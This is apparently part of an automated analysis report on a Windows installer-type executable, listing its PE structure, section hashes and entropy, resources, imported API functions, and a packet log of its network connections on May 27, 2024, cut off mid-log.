IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x48000 | 0x70d00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xd5480 | 0x1458 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5fdd | 0x6000 | 62681be921484302edbc551e93c6d357 | False | 0.6784261067708334 | data | 6.499724004795778 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1352 | 0x1400 | 3d134ae5961af9895950a7ee0adc520a | False | 0.4583984375 | data | 5.207538993430304 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x254f8 | 0x600 | 2d00401e0c64d69b6d0ccb877d9f624e | False | 0.4544270833333333 | data | 4.0323505938358934 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2f000 | 0x19000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x48000 | 0x70d00 | 0x70e00 | ee0de397650a8a3850a4c21fb750a9e0 | False | 0.2557144587486157 | data | 3.819328483239704 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x483b8 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | United States | 0.2202007574636802
RT_ICON | 0x8a3e0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.2796048740092275
RT_ICON | 0x9ac08 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.30720517132646624
RT_ICON | 0xa40b0 | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 26560 | English | United States | 0.326203007518797
RT_ICON | 0xaa898 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.34015711645101665
RT_ICON | 0xafd20 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.35657770429853564
RT_ICON | 0xb3f48 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.3848547717842324
RT_ICON | 0xb64f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.46646341463414637
RT_ICON | 0xb7598 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5163934426229508
RT_ICON | 0xb7f20 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5966312056737588
RT_DIALOG | 0xb8388 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0xb8488 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0xb85a8 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0xb8670 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0xb86d0 | 0x92 | data | English | United States | 0.6986301369863014
RT_VERSION | 0xb8768 | 0x258 | data | English | United States | 0.49166666666666664
RT_MANIFEST | 0xb89c0 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384
DLL | Import
KERNEL32.dll | SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll | RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                May 27, 2024 12:30:45.956197023 CEST44349827142.251.16.101192.168.11.30
                                                                                                May 27, 2024 12:30:46.103187084 CEST44349827142.251.16.101192.168.11.30
                                                                                                May 27, 2024 12:30:46.103341103 CEST44349827142.251.16.101192.168.11.30
                                                                                                May 27, 2024 12:30:46.103429079 CEST49827443192.168.11.30142.251.16.101
                                                                                                May 27, 2024 12:30:46.103527069 CEST49827443192.168.11.30142.251.16.101
                                                                                                May 27, 2024 12:30:46.107376099 CEST49827443192.168.11.30142.251.16.101
                                                                                                May 27, 2024 12:30:46.107386112 CEST44349827142.251.16.101192.168.11.30
                                                                                                May 27, 2024 12:30:46.234488964 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:46.234505892 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:46.234764099 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:46.234931946 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:46.234937906 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:46.463149071 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:46.463469982 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:46.466751099 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:46.466757059 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:46.466991901 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:46.467139006 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:46.467402935 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:46.508178949 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.047971964 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.048130035 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.048289061 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.062931061 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.063249111 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.071019888 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.071336985 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.078772068 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.078979015 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.078988075 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.079312086 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.152556896 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.152765989 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.152775049 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.152940989 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.156308889 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.156514883 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.156522989 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.156689882 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.164139032 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.164294004 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.164320946 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.164633036 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.171775103 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.171921015 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.171927929 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.172147989 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.179593086 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.179811001 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.179819107 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.180150986 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.187136889 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.187360048 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.187366962 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.187534094 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.194907904 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.195238113 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.195244074 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.195408106 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.202363014 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.202614069 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.202620029 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.202788115 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.209104061 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.209444046 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.209451914 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.209831953 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.216001987 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.216159105 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.216166019 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.216334105 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.222805977 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.222999096 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.223006010 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.223167896 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.229588032 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.229777098 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.233151913 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.233465910 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.233473063 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.233685017 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.239886999 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.240031958 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.240040064 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.240215063 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.257643938 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.257971048 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.257977962 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.258117914 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.260164976 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.260322094 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.260329008 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.260492086 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.265458107 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.265665054 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.265671968 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.266006947 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.270503998 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.270833015 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.270839930 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.271047115 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.274899960 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.275082111 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.275089025 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.275520086 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.279777050 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.279916048 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.280124903 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.280124903 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.280134916 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.280365944 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.285341978 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.285511971 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.285520077 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.285681009 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.289376020 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.289705038 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.289712906 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.290021896 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.294153929 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.294317007 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.294323921 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.294481993 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.298731089 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.299063921 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.299072027 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.299205065 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.303463936 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.303828955 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.305833101 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.306210995 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.306216955 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.306550026 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.310801029 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.311167002 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.311173916 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.311765909 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.315392971 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.315650940 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.315658092 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.315824032 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.320159912 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.320338011 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.320344925 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.320517063 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.324911118 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.325284958 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.325292110 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.325551987 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.329658985 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.329988003 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.329994917 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.330172062 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.334410906 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.334598064 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.334605932 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.334768057 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.339392900 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.339548111 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.339555979 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.339807987 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.343767881 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.343945980 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.343952894 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.344111919 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.348392010 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.348731041 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.476665974 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.476675034 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.476883888 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.478317022 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.478631020 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.478642941 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.478851080 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.479919910 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.480065107 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.480076075 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.480283976 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.481749058 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.481926918 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.481934071 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.482242107 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.483376980 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.483522892 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.483534098 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.483741045 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.484947920 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.485135078 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.485145092 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.485352993 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.486726046 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.486927032 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.486932993 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.487097025 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.488158941 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.488331079 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.488338947 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.488512993 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.489717007 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.489996910 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.490001917 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.490215063 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.491290092 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.491492033 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.491502047 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.491831064 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.492929935 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.493103027 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.493113995 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.493309021 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.494390965 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.494548082 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.494553089 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.494718075 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.495882988 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.496023893 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.496030092 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.496193886 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.497580051 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.497750998 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.497761011 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.497927904 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.498876095 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.499054909 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.499059916 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.499224901 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.500350952 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.500502110 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.500514030 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.500669956 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.501739025 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.501888037 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:30:47.501935959 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.502098083 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.502146006 CEST49828443192.168.11.30172.253.62.132
                                                                                                May 27, 2024 12:30:47.502155066 CEST44349828172.253.62.132192.168.11.30
                                                                                                May 27, 2024 12:31:16.477189064 CEST4982980192.168.11.30208.112.85.150
                                                                                                May 27, 2024 12:31:16.580259085 CEST8049829208.112.85.150192.168.11.30
                                                                                                May 27, 2024 12:31:16.580533981 CEST4982980192.168.11.30208.112.85.150
                                                                                                May 27, 2024 12:31:16.583331108 CEST4982980192.168.11.30208.112.85.150
                                                                                                May 27, 2024 12:31:16.686728954 CEST8049829208.112.85.150192.168.11.30
                                                                                                May 27, 2024 12:31:16.689500093 CEST8049829208.112.85.150192.168.11.30
                                                                                                May 27, 2024 12:31:16.689805984 CEST8049829208.112.85.150192.168.11.30
                                                                                                May 27, 2024 12:31:16.689989090 CEST4982980192.168.11.30208.112.85.150
                                                                                                May 27, 2024 12:31:16.692523956 CEST4982980192.168.11.30208.112.85.150
                                                                                                May 27, 2024 12:31:16.795653105 CEST8049829208.112.85.150192.168.11.30
                                                                                                May 27, 2024 12:31:32.380384922 CEST4983180192.168.11.3079.98.25.1
